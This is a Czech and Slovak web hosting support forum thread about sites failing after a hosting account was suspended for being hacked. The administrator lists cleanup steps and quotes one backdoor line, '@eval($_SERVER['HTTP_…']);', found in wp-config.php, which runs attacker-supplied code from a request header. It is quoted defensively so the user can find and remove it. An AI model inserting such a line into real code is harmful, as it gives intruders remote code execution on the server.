Stránky (2): 1 2   
ginwayn   14.01.2026, 02:28
Dobrý den,

ostatní moje stránky na vašem hostingu se už dnes rozjeli (problém s certifikátem) s výjimkou https://karelgott.mzf.cz/.
Kromě generování certifikátů jsem žádné jiné změny nedělal a před pár dny jsem si všimnul, že tyto stránky nefungují.

Můžete prosím pomoci s řešením toho problému?
Děkuji
cache   12.03.2026, 14:38
Dobry den administratori,

nechcem vytvarat novu temu, ale tuto istu chybu, ERR_HTTP2_PROTOCOL_ERROR pre https, resp. ERR_EMPTY_RESPONSE pre nesiftovane http vracia aj pri mojej domene uz druhy den.

Nevznikla Vam na hostingu nejaka chyba pri generovani vhostov?
jan   13.03.2026, 18:20
Dobrý den, chyba může být způsobena více možnosti, například že je váš webhosting pozastaven z důvodu infiltrace (zasílali jsme informaci emailem v den pozastavení) nebo jsou u daného hostingu omezeny krajiny pro POST požadavky na CZ a SK.
cache   13.03.2026, 19:39
Zdravim, neprisiel mi ziaden email. V administracii vidim hosting p.6f.sk aktivny, ip/geoip nemam nastaveny (vsetky adresy povolene).
jan   13.03.2026, 19:58
Dobrý den, webhosting p.6f.sk je pozastaven z důvodu hacknutí. Informace byla zaslána 07.03.2026 12:57 na email veden u účtu. Prosím pročistěte obsah. Následně jej zkontrolujeme a pokud bude vše v pořádku, webhosting povolíme. Děkuji
cache   13.03.2026, 21:27
Dobry vecer, znova som si skontroloval email, ktory patri k uctu, skontroloval som si aj spam, aj kos (ak by nahodou) a skutocne som ziaden email od Vas nedostal, resp. netusim kde sa stratil. Vsetka ostatna komunikacia (napr. o migracii) mi dosla. Viete mi prosim odoslat ten email znova? Su v nom nejake detaily ohladom toho hacku, ci je to len genericka informacia?
Zmenil som hesla, skontroloval obsah, nieco pomazal, ale nemam dojem, ze by mi tam niekto nieco pomenil.
Dakujem.
jan   13.03.2026, 23:10
Dobrý den, email jsem vám zaslal znovu. Jsou v něm však obecné informace.

Je potřeba provést důkladné vyčištění webu, konkrétně:
- zkontrolovat a pročistit soubory na FTP (soubory webu),
- zkontrolovat a vyčistit databázi – nachází se zde velké množství nežádoucích stránek (řádově tisíce),
- prověřit administrátorské účty a odstranit ty, které neznáte,
- zkontrolovat soubory pro ověření služby Google (na FTP je jich větší množství).

Dále jsme zjistili, že v souboru wp-config.php se občas vyskytuje zápis ve formátu @eval($_SERVER['HTTP_4395531']);, přičemž číslo se může měnit. Tento kód může být součástí skriptu sloužícího k získání neoprávněného přístupu k serveru a je nutné jej co nejdříve odstranit.
cache   14.03.2026, 00:41
Dobry vecer, teraz uz email dosiel, odstranil som skripty, ktore zrejme sposobovali pretazovanie.
P.S. wp-config.php sa tam ani nenachadzal, nemam tam wordpress..
jan   14.03.2026, 15:47
Dobrý den, děkuji, webhosting jsem povolil. Změna se projeví do hodiny.
cache   16.03.2026, 15:28
Dakujem.
Stránky (2): 1 2   

Uživatel(é) prohlížející tohle téma: 1 host(ů)
Fórum používá MyBB, © 2002-2026 MyBB Group.